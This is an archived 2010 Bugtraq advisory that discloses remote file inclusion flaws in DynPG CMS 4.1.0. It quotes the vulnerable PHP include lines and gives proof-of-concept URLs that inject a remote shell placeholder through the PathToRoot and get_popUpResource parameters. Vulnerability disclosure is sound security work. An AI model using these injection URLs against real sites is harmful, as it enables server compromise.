lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201004011238.o31Cci80023707@www3.securityfocus.com>
Date: Thu, 1 Apr 2010 06:38:44 -0600
From: eidelweiss@...erservices.com
To: bugtraq@...urityfocus.com
Subject: DynPG CMS v4.1.0 Multiple Remote File Inclusion Vulnerability

Dear,

I found Some vulnerability in DynPG CMS , This the full exploit code:

[+]Title	:	DynPG CMS Multiple Remote File Inclusion Vulnerability
[+]Version:	4.1.0 (Other or lower versions may also be affected)
[+]Download:	http://www.dynpg.org/download_en.php
[+]License:	GNU / GPL
[+]Metode :	Remote File Inclusion
[+]Author:	eidelweiss

	[*]Special to Syabilla_putri (I miss u so much to)[*]

	[!]Thank`s Fly To:

[~] Jose Luis Gongora Fernandez a.k.a JosS
[~] exploit-db team (loneferret - Exploits - dookie2000ca)
[~] r0073r & 0x1D , [D]eal [C]yber

########################################################

Description:

DynPG is used to upload and manage dynamic web content similar to other content management systems.
DynPG however differs from other CMS, because it is embedded directly into websites.
The software was originally developed to realize designs that are created with Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any other graphics software.
The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or even as simple code.
After that, code snippets are placed at those points, where dynamically generated content (like articles, galleries, blogs or other dynamic content) shall be generated.
It provides a convenient way to extend existing websites with dynamic content. DynPG provides a template engine, but also supports existing CSS layouts.

########################################################

	-=[ Vuln C0de ]=-

[!] counter.php

		require_once $GLOBALS["DefineRootToTool"]."config.php";	// line 15
		require_once $GLOBALS["DefineRootToTool"]."connectdb.php";	// line 16


[!] /plugins/DPGguestbook/guestbookaction.php

<?php
    function dynPG_Guestbook_proceedREQ()
    {
      require_once $GLOBALS['DynPG']->PathToRoot .'config.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'defines.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php';


[!] /backendpopup/popup.php

	require './resources/' . $get_popUpResource . '/index.res.php';	// line 36

[!] etc , etc , etc


	-=[ Proof Of Concept ]=-
	
	http://127.0.0.1/DynPG_path/plugins/DPGguestbook/guestbookaction.php?PathToRoot= [inject0r sh3ll]
	http://127.0.0.1/DynPG_path/backendpopup/popup.php?get_popUpResource= [inj3ct0r sh3ll]

	etc , etc , etc
	
######################=[E0F]=#############################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ